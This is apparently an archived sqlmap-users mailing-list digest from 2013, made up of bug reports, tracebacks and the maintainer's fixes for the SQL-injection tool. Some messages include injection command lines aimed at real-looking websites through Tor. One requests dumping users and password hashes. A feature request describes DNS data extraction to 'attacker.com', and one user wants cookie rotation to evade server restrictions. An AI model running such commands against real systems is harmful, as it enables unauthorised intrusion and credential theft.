> > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie>
> > [..]
> > --snap
> >
> > They are all session cookies. For easier reading here I put some blanks in the line
> > above, in "cookie-file" there aren't any though. Cookies were generated with
> > stompy and a shell script (looks the same as with
> > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file> <URL>)
> >
> > Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
> >
> > > Also, please make sure that the cookie file contains proper cookie(s) - domain name should be the same as a domain of target, cookie needs to have a proper valid time, etc.
> >
> > see above.
> >
> > Cheers,
> >
> > Dirk
> >
> > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...> wrote:
> > >
> > > Hi Miroslav,
> > >
> > > yes unfortunately.
> > >
> > > If I omit the cookie line in the request header completely, sqlmap
> > > seems to take the first cookie issued by the server with set-cookie (and
> > > puts it silently in).
> > >
> > > Cheers,
> > >
> > > Dirk
> > >
> > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
> > > > Hi.
> > > >
> > > > And this is also happening if you are skipping "Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
> > > >
> > > > Kind regards,
> > > > Miroslav Stampar
> > > >
> > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...> wrote:
> > > >
> > > > Hi folks,
> > > >
> > > > .... that doesn't work for me. It always uses the cookie supplied
> > > > (below in $REQUEST, or if I omit the line in $REQUEST the one
> > > > from the 1st server reply is being used)
> > > >
> > > > So what is wrong in here:
> > > >
> > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
> > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
> > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
> > > > --level=2 --risk=2 -r $REQUEST
> > > >
> > > > The content of the file $REQUEST is:
> > > >
> > > > POST <URL> HTTP/1.1
> > > > Host: <HOST>
> > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.6 Safari/525.13
> > > > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> > > > Accept-Language: en-US,en;q=0.5
> > > > Accept-Encoding: gzip, deflate
> > > > Referer: <Referer>
> > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
> > > > Connection: keep-alive
> > > > Content-Type: application/x-www-form-urlencoded
> > > > Content-Length: 67
> > > >
> > > > <abunchofpostparams>
> > > >
> > > > No hints that cookie-file is not in correct format (I've been through this,
> > > > at least I think so ;) ).
> > > >
> > > > Any insight would be much appreciated.
> > > >
> > > > Cheers,
> > > >
> > > > Dirk
> > > >
> > > > --
> > > > Miroslav Stampar
> > > > http://about.me/stamparm
>
> ------------------------------
>
> Message: 3
> Date: Mon, 15 Apr 2013 11:45:19 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] --load-cookies
> To: Dirk Wetter <sp...@dr...>
> Cc: SqlMap List <sql...@li...>
> Message-ID: <CA+9yoX0yAGFkCiLuycVqdbm8jvnMeEPgJdXoYZi_4NTW-YQo=Q...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi Dirk.
>
> Now that crash should be "patched".
>
> Could you please retry it now and say if the latest revision suits your needs?
>
> Kind regards,
> Miroslav Stampar
>
> On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...> wrote:
>
> > On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> > > Nevertheless, with the latest commit that check should be "neutralized" now. Could you please retry it now?
> >
> > thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib hiccups, using the same file:
> >
> > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
> > Traceback (most recent call last):
> >   File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in _really_load
> >     assert domain_specified == initial_dot
> > AssertionError
> >
> >   _warn_unhandled_exception()
> > [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1': '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
> >
> > the 999.. looks strange to me.
> >
> > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <mir...@gm...> wrote:
> > >
> > > Hi Dirk.
> > >
> > > Well, I would say that you have an expired cookie. Do you see that value 0? That value should be a valid UNIX time representing time of cookie expiration. Also, I've just tested that cookie of yours and sqlmap says: "[WARNING] cookie '....' has expired"
> >
> > that's true but IMO 0 represents just a session cookie. Example:
> >
> > prompt% wget -q -O /dev/null --keep-session-cookies --save-cookies=/dev/stdout bing.com
> > # HTTP cookie file.
> > # Generated by Wget on 2013-04-15 11:23:13.
> > # Edit at your own risk.
> >
> > .bing.com TRUE / FALSE 1429089794 SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415
> > .bing.com TRUE / FALSE 1429089794 SRCHD D=2781203&MS=2781203&AF=NOFORM
> > .bing.com TRUE / FALSE 1429089794 OrigMUID 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
> > .bing.com TRUE / FALSE 1429089794 MUID 333995A69E06630B2EB491169F016314
> > .bing.com TRUE / FALSE 0 _SS SID=B954CB7EDF8643CABAD8013F27A241E7
> > .bing.com TRUE / FALSE 0 _HOP
> > .bing.com TRUE / FALSE 0 _FS NU=1
> > .bing.com TRUE / FALSE 1429089794 _FP EM=1
> > www.bing.com FALSE / FALSE 1429089794 SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D
> > www.bing.com FALSE / FALSE 1429089794 MUIDB 333995A69E06630B2EB491169F016314
> >
> > prompt%
> >
> > Same parser problem btw if I edit the cookie file and put 1429089794 unix time instead of 0 in there.
> >
> > Ok: With the prev rev ed5599f it reads this file ok (no session cookies
> > but cookies w/ expiration date) and uses the last
> > cookie only for the first 120 tries.
> >
> > Cheers, Dirk
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
> ------------------------------
>
> Message: 4
> Date: Mon, 15 Apr 2013 11:46:21 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] Patch for /task/<task_id>/delete in clean_filesystem
> To: Brandon Perry <bpe...@gm...>
> Cc: sqlmap users <sql...@li...>
> Message-ID: <CA+9yoX3RNQDm=PqT...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi Brandon.
>
> Thank you for your patch and find it now included [1].
>
> Kind regards,
> Miroslav Stampar
>
> [1] https://github.com/sqlmapproject/sqlmap/commit/8853e43616e89f26cfd6d1c1540e02ed6b4ca224
>
> On Sat, Apr 13, 2013 at 8:36 PM, Brandon Perry <bpe...@gm...> wrote:
>
> > Hi, the attached patch fixes an issue with the /task/<task_id>/delete api
> > call when self.output_directory is NoneType and clean_system() is called.
> >
> > --
> > http://volatile-minds.blogspot.com -- blog
> > http://www.volatileminds.net -- website
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
> ------------------------------
>
> Message: 5
> Date: Mon, 15 Apr 2013 12:19:13 +0200
> From: Dirk Wetter <sp...@dr...>
> Subject: Re: [sqlmap-users] --load-cookies
> To: Miroslav Stampar <mir...@gm...>
> Cc: SqlMap List <sql...@li...>
> Message-ID: <516...@dr...>
> Content-Type: text/plain; charset=ISO-8859-1
>
> Hi Miroslav,
>
> On 04/15/2013 11:45 AM, Miroslav Stampar wrote:
> > Hi Dirk.
> >
> > Now that crash should be "patched".
> >
> > Could you please retry it now and say if the latest revision suits your needs?
>
> cool, thx. Works!
>
> However (sorry):
>
> One needs to omit the cookie in the request header, otherwise it just uses the one
> supplied by the request.
>
> Then: It doesn't change the cookie. Maybe I was interpreting that not correctly
> but my point was using the load-cookies option to direct sqlmap to change
> cookies once in a while (whenever that's gonna be). This is to circumvent
> restrictions one can encounter otherwise....
>
> Cheers,
>
> Dirk
>
> > Kind regards,
> > Miroslav Stampar
>
> ------------------------------
>
> Message: 6
> Date: Mon, 15 Apr 2013 14:01:01 -0700
> From: <co...@5i...>
> Subject: [sqlmap-users] --host parameter
> To: sql...@li...
> Message-ID: <201...@em...>
> Content-Type: text/plain; charset="utf-8"
>
> Hello,
> the --host doesn't work as expected, or I am doing something wrong:
>
> this works as expected:
>
> ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
>
> sqlmap/1.0-dev-840ee26 - automatic SQL injection and database takeover tool
> http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 23:57:15
>
> [23:57:15] [INFO] testing connection to the target URL
> [23:57:15] [INFO] heuristics detected web page charset 'ascii'
> [23:57:15] [INFO] testing if the target URL is stable. This can take a couple of seconds
> [23:57:16] [INFO] target URL is stable
> [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
> [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
> [23:57:16] [INFO] GET parameter 'id' is dynamic
> [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
> [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
>
> ....
>
> this doesn't work as expected:
>
> ./sqlmap.py --host='i.csland.ro' --url='http://188.240.236.15/index.php?id=0'
>
> sqlmap/1.0-dev-840ee26 - automatic SQL injection and database takeover tool
> http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 23:58:03
>
> [23:58:03] [INFO] testing connection to the target URL
> [23:58:03] [CRITICAL] page not found (404)
> it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n]
> [23:58:05] [WARNING] HTTP error codes detected during run:
>
> ............
>
> Of course i.csland.ro resolves to 188.240.236.15. Any idea?
>
> Thanks.
>
> ------------------------------
>
> Message: 7
> Date: Tue, 16 Apr 2013 09:12:05 +1100
> From: ???????? ?????? <vo...@s2...>
> Subject: [sqlmap-users] Sqlmap and direct connect error
> To: sql...@li...
> Message-ID: <C59...@s2...>
> Content-Type: text/plain; charset=us-ascii
>
> Hi!
>
> This bug detected if add direct param.
>
> python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables --exclude-sysdbs
>
> [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-de99717
> Python version: 2.7.3
> Operating system: posix
> Command line: sqlmap.py -d **************************************************** -u http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables --exclude-sysdbs
> Technique: None
> Back-end DBMS: MySQL (identified)
> Traceback (most recent call last):
>   File "sqlmap.py", line 87, in main
>     start()
>   File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in start
>     action()
>   File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action
>     setHandler()
>   File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in setHandler
>     conf.dbmsConnector.connect()
>   File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in connect
>     self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True)
>   File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py", line 93, in Connect
>     return Connection(*args, **kwargs)
>   File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", line 584, in __init__
>     self._connect()
>   File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", line 739, in _connect
>     sock.connect((self.host, self.port))
>   File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in connect
>     raise GeneralProxyError((5, _generalerrors[5]))
> GeneralProxyError: (5, 'bad input')
>
> ------------------------------
>
> Message: 8
> Date: Tue, 16 Apr 2013 14:19:18 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] --host parameter
> To: co...@5i...
> Cc: SqlMap List <sql...@li...>
> Message-ID: <CA+...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi.
>
> Thank you for your report and find it fixed with the latest commit [1].
>
> Kind regards,
> Miroslav Stampar
>
> [1] https://github.com/sqlmapproject/sqlmap/commit/6fed1921edf1baaf23a54fbe340ff3781fc05c86
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
> ------------------------------
>
> Message: 9
> Date: Tue, 16 Apr 2013 14:33:33 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] Sqlmap and direct connect error
> To: ???????? ?????? <vo...@s2...>
> Cc: SqlMap List <sql...@li...>
> Message-ID: <CA+9yoX0rxH+=vZuYiArFNZhK1xhwos=SNhMqEmFmnCafw-ot=g...@ma...>
> Content-Type: text/plain; charset="koi8-r"
>
> Hi Vladimir.
>
> Find it "patched" with the latest commit [1]. Basically, those combinations
> should not be allowed (-d and --url; -d and --tor; etc.) and now we've
> added new option validation checks for this kind of cases.
>
> Kind regards,
> Miroslav Stampar
>
> [1] https://github.com/sqlmapproject/sqlmap/commit/c73489aff3861f1cac7de41494a296c1095e141a
>
> On Tue, Apr 16, 2013 at 12:12 AM, ???????? ?????? <vo...@s2...> wrote:
>
> > Hi!
> >
> > This bug detected if add direct param.
> >
> > python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables --exclude-sysdbs
> >
> > [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
> > sqlmap version: 1.0-dev-de99717
> > Python version: 2.7.3
> > Operating system: posix
> > Command line: sqlmap.py -d **************************************************** -u http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables --exclude-sysdbs
> > Technique: None
> > Back-end DBMS: MySQL (identified)
> > Traceback (most recent call last):
> >   File "sqlmap.py", line 87, in main
> >     start()
> >   File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in start
> >     action()
> >   File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action
> >     setHandler()
> >   File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in setHandler
> >     conf.dbmsConnector.connect()
> >   File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in connect
> >     self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True)
> >   File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py", line 93, in Connect
> >     return Connection(*args, **kwargs)
> >   File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", line 584, in __init__
> >     self._connect()
> >   File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", line 739, in _connect
> >     sock.connect((self.host, self.port))
> >   File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in connect
> >     raise GeneralProxyError((5, _generalerrors[5]))
> > GeneralProxyError: (5, 'bad input')
> >
> > ------------------------------------------------------------------------------
> > Precog is a next-generation analytics platform capable of advanced
> > analytics on semi-structured data.
The platform includes APIs for > building > > apps and a phenomenal toolset for data science. Developers can use > > our toolset for easy data analysis & visualization. Get a free account! > > http://www2.precog.com/precogplatform/slashdotnewsletter > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > -- > Miroslav Stampar > http://about.me/stamparm > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 10 > Date: Tue, 16 Apr 2013 23:26:39 +0200 > From: buawig <bu...@gm...> > Subject: [sqlmap-users] feature request: offline mode for > --dns-domain? > To: SqlMap List <sql...@li...> > Message-ID: <516...@gm...> > Content-Type: text/plain; charset=UTF-8 > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > Hi, > > in cases where sqlmap is run against targets on internal networks it > would be great if one could tell sqlmap to simply proceed without > expecting incoming DNS requests, because sqlmap can not be executed > directly on the DNS server (which can't reach the target, but the > target can reach the DNS server). > > For me it would be enough to simply run something like > - -u ... --dns-domain=attacker.com --dns-port=0 > (--dns-port does not exist [yet]) > > to let sqlmap know that it doesn't need to start a DNS listener. > > I would then collect and decode the DNS querries on the DNS server > manually, but I could also envision runni... [truncated message content] |
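The cookie-file problems discussed in the quoted digest (an expiry of 0 read as "expired" versus "session cookie", and the failing `domain_specified == initial_dot` assertion) can be checked before a file is handed to a cookie-jar loader. The following is an added example, not sqlmap's code and not part of any message in this thread; the function names (`parse_line`, `lint`, `repair`) and the sample cookies are constructed for illustration.

```python
import time
from collections import namedtuple

Cookie = namedtuple("Cookie", "domain domain_specified path secure expires name value")

# Constructed sample (not from the thread): seven tab-separated fields per line.
SAMPLE = "\n".join([
    "# Netscape HTTP Cookie File",
    ".example.test\tTRUE\t/\tFALSE\t1429089794\tMUID\tconstructed-1",
    ".example.test\tTRUE\t/\tFALSE\t0\t_SS\tconstructed-2",
    "app.example.test\tTRUE\t/app\tTRUE\t9999999999\tJSESSIONID\tconstructed-3",
    "app.example.test\tFALSE\t/app\tTRUE\t0\tJSESSIONID\tconstructed-4",
    "broken line without tabs",
])


def parse_line(line):
    """Parse one line; return None for blank lines and comments."""
    line = line.rstrip("\r\n")
    if not line.strip() or line.startswith("#"):
        return None
    fields = line.split("\t")
    if len(fields) != 7:
        raise ValueError("expected 7 tab-separated fields, got %d" % len(fields))
    domain, flag, path, secure, expires, name, value = fields
    if flag not in ("TRUE", "FALSE") or secure not in ("TRUE", "FALSE"):
        raise ValueError("flag fields must be TRUE or FALSE")
    if expires and not expires.isdigit():
        raise ValueError("expiry must be empty or a UNIX timestamp")
    return Cookie(domain, flag == "TRUE", path, secure == "TRUE",
                  int(expires or 0), name, value)


def lint(text, now=None, zero_is_session=True):
    """Return (line_number, kind, detail) findings for a cookie file.

    zero_is_session=True follows the wget convention shown in the thread
    (expiry 0 = session cookie); False treats 0 as a timestamp in the past.
    """
    now = time.time() if now is None else now
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        try:
            cookie = parse_line(line)
        except ValueError as exc:
            findings.append((number, "malformed", str(exc)))
            continue
        if cookie is None:
            continue
        # Same condition as the failing 'assert domain_specified == initial_dot'
        # in the traceback quoted in the thread.
        if cookie.domain_specified != cookie.domain.startswith("."):
            findings.append((number, "domain-flag-mismatch", cookie.domain))
        if cookie.expires == 0 and zero_is_session:
            findings.append((number, "session", cookie.name))
        elif cookie.expires < now:
            findings.append((number, "expired", cookie.name))
    return findings


def repair(cookie):
    """Re-serialise a cookie with the domain flag derived from the leading dot."""
    flag = "TRUE" if cookie.domain.startswith(".") else "FALSE"
    return "\t".join([cookie.domain, flag, cookie.path,
                      "TRUE" if cookie.secure else "FALSE",
                      str(cookie.expires), cookie.name, cookie.value])


if __name__ == "__main__":
    for finding in lint(SAMPLE, now=1366000000):  # fixed clock: mid-April 2013
        print(finding)
```

Running `lint` with `zero_is_session=False` reports the same two session cookies as expired, which is the other reading of the 0 value argued in the thread.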
From: Miroslav S. <mir...@gm...> - 2013-06-01 11:46:06
Hi.

This should be "patched" now.

Bye

On Thu, May 30, 2013 at 4:57 PM, Bob <sto...@qq...> wrote:

> Hi friend,
>
>
> Could you help me with this bug ?
>
>
> [22:54:12] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your
> run with the latest development version from the GitHub repository. If the
> exception persists, please send by e-mail to '
> sql...@li...' or open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers will
> try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev
> Python version: 2.7.3
> Operating system: posix
> Command line: ./sqlmap -u ***********************************************
> --data=__VIEWSTATE=%2FwEPDwUJNzcyNzA5MTcxD2QWAmYPZBYCAgMPZBYCAgUPZBYCAg8PPCsAEQIADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmQBEBYAFgAWAGQYAQUaY3RsMDAkTWFpbkNvbnRlbnQkRGdSZXN1bHQPPCsADAEIZmTqSkxVHfCvk8H514IG2vidRqlanHHD7kZRl389CeOupw%3D%3D&__EVENTVALIDATION=%2FwEWCAK%2BjdvyCQLM8NjFBQKgo%2F%2FzCgKumJP3BALizcLsAwL%2Bq8zvCgKsq6%2F4DwLTytO4BPwtq4Qe7jKJMNFTIKI0vDR6PinuEV%2BLf13FWcmth6Av&ctl00%24MainContent%24TxtContCode=ZAP&ctl00%24MainContent%24TxtItemCode=ZAP&ctl00%24MainContent%24BtnFind=%E6%9F%A5%E8%AF%A2&ctl00%24MainContent%24TxtTestCustname=ZAP&ctl00%24MainContent%24TxtItemName=ZAP&ctl00%24MainContent%24TxtCheckManuCrock=ZAP&ctl00%24MainContent%24TxtCheckNo=ZAP
> -p ctl00%24MainContent%24TxtContCode -o --level 3 --risk 5 --dbms=Microsoft
> SQL Server --users --passwords
> Technique: BOOLEAN
> Back-end DBMS: Microsoft SQL Server (fingerprinted)
> Traceback (most recent call last):
> File "./sqlmap", line 87, in main
> start()
> File "/usr/share/sqlmap/lib/controller/controller.py", line 572, in start
> action()
> File "/usr/share/sqlmap/lib/controller/action.py", line 81, in action
> conf.dbmsHandler.getPasswordHashes(), "password hash",
> CONTENT_TYPE.PASSWORDS)
> File
"/usr/share/sqlmap/plugins/generic/users.py", line 243, in > getPasswordHashes > if user in retrievedUsers: > TypeError: unhashable type: 'list' > > [*] shutting down at 22:54:12 > Thanks > > BOB > > > > > ------------------ Original ------------------ > *From: * "sqlmap-users-request"<sql...@li... > >; > *Date: * May 29, 2013 > *To: * "sqlmap-users"<sql...@li...>; > *Subject: * sqlmap-users Digest, Vol 31, Issue 1 > > Send sqlmap-users mailing list submissions to > sql...@li... > > To subscribe or unsubscribe via the World Wide Web, visit > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > or, via email, send a message with subject or body 'help' to > sql...@li... > > You can reach the person managing the list at > sql...@li... > > When replying, please edit your Subject line so it is more specific > than "Re: Contents of sqlmap-users digest..." > > > Today's Topics: > > 1. Re: Feature request (David Guimaraes) > 2. Re: --load-cookies (Dirk Wetter) > 3. Re: --load-cookies (Miroslav Stampar) > 4. Re: Patch for /task/<task_id>/delete in clean_filesystem > (Miroslav Stampar) > 5. Re: --load-cookies (Dirk Wetter) > 6. --host parameter (co...@5i...) > 7. Sqlmap and direct connect error (???????? ??????) > 8. Re: --host parameter (Miroslav Stampar) > 9. Re: Sqlmap and direct connect error (Miroslav Stampar) > 10. feature request: offline mode for --dns-domain? (buawig) > 11. feature request: --dns-domain for non-root users (--dns-port) > (buawig) > 12. Domain credentials (Brian Milliron) > 13. Re: Domain credentials (Brandon Perry) > 14. Re: feature request: offline mode for --dns-domain? > (Miroslav Stampar) > 15. Re: Domain credentials (Miroslav Stampar) > 16. Re: feature request: fetch DNS queries from DNS server via > HTTP (buawig) > 17. Re: feature request: fetch DNS queries from DNS server via > HTTP (Miroslav Stampar) > 18. MySQL error based technique bug (Konrads Smelkovs) > 19. Re: MySQL error based technique bug (Miroslav Stampar) > 20. 
SQLmap crashing (Phillip Wylie) > 21. Re: SQLmap crashing (Miroslav Stampar) > 22. Custom injection payload in POST (Marcell Fodor) > 23. Re: SQLmap crashing (Miroslav Stampar) > 24. I got error on windows (warezhacking) > 25. Appending to a dump (Stephen Shkardoon) > 26. Re: Appending to a dump (Miroslav Stampar) > 27. Re: Appending to a dump (Stephen Shkardoon) > 28. Re: Appending to a dump (Miroslav Stampar) > 29. --ignore-404 ? (buawig) > 30. PostgreSQL: substr('string', 1, 1) vs. substring('string' > from 1 for 1) (buawig) > 31. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string' > from 1 for 1) (Miroslav Stampar) > 32. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string' > from 1 for 1) (Miroslav Stampar) > 33. Re: --ignore-404 ? (Miroslav Stampar) > 34. BUG...!!!! o.O (Isai Ofir Juarez Contreras) > 35. Re: BUG...!!!! o.O (Miroslav Stampar) > 36. gun...@gm... wants to follow you. Accept? > (gun...@gm...) > 37. Direct access to mysql database (Marcell Fodor) > 38. Re: Direct access to mysql database (Miroslav Stampar) > 39. ? Sqlmap Users, Marco Mirandola ti ha inviato un messaggio... > (Badoo) > 40. Not getting any sensitive data from database (Marcell Fodor) > 41. Re: Not getting any sensitive data from database > (Miroslav Stampar) > 42. unhandled exception (kvasilopoulos) > 43. [SQLMAP] Unhandled exception for IPv6 > (e.n...@st...) > 44. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar) > 45. Re: unhandled exception (Miroslav Stampar) > 46. Passing SOAPAction in --header (Brandon Perry) > 47. Re: Passing SOAPAction in --header (Miroslav Stampar) > 48. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar) > 49. Blind SQL Injection question (Guy Dufour) > 50. Re: Blind SQL Injection question (Chris Oakley) > 51. Re: Passing SOAPAction in --header (Brandon Perry) > 52. Re: Passing SOAPAction in --header (Brandon Perry) > 53. Deploy&Create SSH/tunnel with compromised MSSQL server > (Alok Kumar) > 54. 
Re: Deploy&Create SSH/tunnel with compromised MSSQL server > (Brandon Perry) > 55. Re: Deploy&Create SSH/tunnel with compromised MSSQL server > (Alok Kumar) > 56. Re: Deploy&Create SSH/tunnel with compromised MSSQL server > (Brandon Perry) > 57. SQLMAP Bug (Joe O'Hara) > 58. Re: SQLMAP Bug (Miroslav Stampar) > 59. [CRITICAL] (Thai Thao) > 60. Re: [CRITICAL] (Miroslav Stampar) > 61. Providing multiple dbms (Sebastian Nerz) > 62. Re: Providing multiple dbms (Miroslav Stampar) > > > ---------------------------------------------------------------------- > > Message: 1 > Date: Sat, 13 Apr 2013 21:40:39 -0300 > From: David Guimaraes <sk...@gm...> > Subject: Re: [sqlmap-users] Feature request > To: Miroslav Stampar <mir...@gm...> > Cc: SqlMap List <sql...@li...> > Message-ID: > <CAJ...@ma...> > Content-Type: text/plain; charset="iso-8859-1" > > Good question Miroslav.. I tried to think in something that can be > implemented without ruin sqlmap query schema, but I could not come to any > conclusion... =( > > The thing is, sqlsus use a different approch to dump the data, making this > kind of thing possible... > > The solution that I found in this particular scenario is to use sqlsus, > unfortunately... > > Regards. > > David > > > On Mon, Apr 1, 2013 at 6:35 PM, Miroslav Stampar < > mir...@gm... > > wrote: > > > Hi David. > > > > And what do you recommend to be done in case of query with length > > > max_inj_length? > > > > Kind regards, > > Miroslav Stampar > > On Apr 1, 2013 11:14 PM, "David Guimaraes" <sk...@gm...> wrote: > > > >> Hi, I am trying to perform sql injection on a web site but I can not get > >> successful due to a size limitation on the query sent to the server. The > >> server is limiting the size of query in 512 bytes only and sqlmap do not > >> have any customization that allows me to bypass this restriction like > >> sqlsus "max_inj_length" parameter. Sqlsus has a feature called > "autoconf" > >> that measure the permited query size. 
> >> > >> There is some chance to put this kind of feature in sqlmap? > >> > >> Thanks. > >> > >> -- > >> David Gomes Guimar?es > >> > >> > >> > ------------------------------------------------------------------------------ > >> Own the Future-Intel® Level Up Game Demo Contest 2013 > >> Rise to greatness in Intel's independent game demo contest. > >> Compete for recognition, cash, and the chance to get your game > >> on Steam. $5K grand prize plus 10 genre and skill prizes. > >> Submit your demo by 6/6/13. http://p.sf.net/sfu/intel_levelupd2d > >> _______________________________________________ > >> sqlmap-users mailing list > >> sql...@li... > >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> > >> > > > -- > David Gomes Guimar?es > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 2 > Date: Mon, 15 Apr 2013 11:36:37 +0200 > From: Dirk Wetter <sp...@dr...> > Subject: Re: [sqlmap-users] --load-cookies > To: Miroslav Stampar <mir...@gm...> > Cc: SqlMap List <sql...@li...> > Message-ID: <516...@dr...> > Content-Type: text/plain; charset=ISO-8859-1 > > > > On 04/14/2013 01:14 AM, Miroslav Stampar wrote: > > Nevertheless, with the latest commit that check should be "neutralized" > now. Could you please retry it now? > > thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib > hiccups, using the same file: > > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug! > Traceback (most recent call last): > File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in > _really_load > assert domain_specified == initial_dot > AssertionError > > _warn_unhandled_exception() > [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid > Netscape format 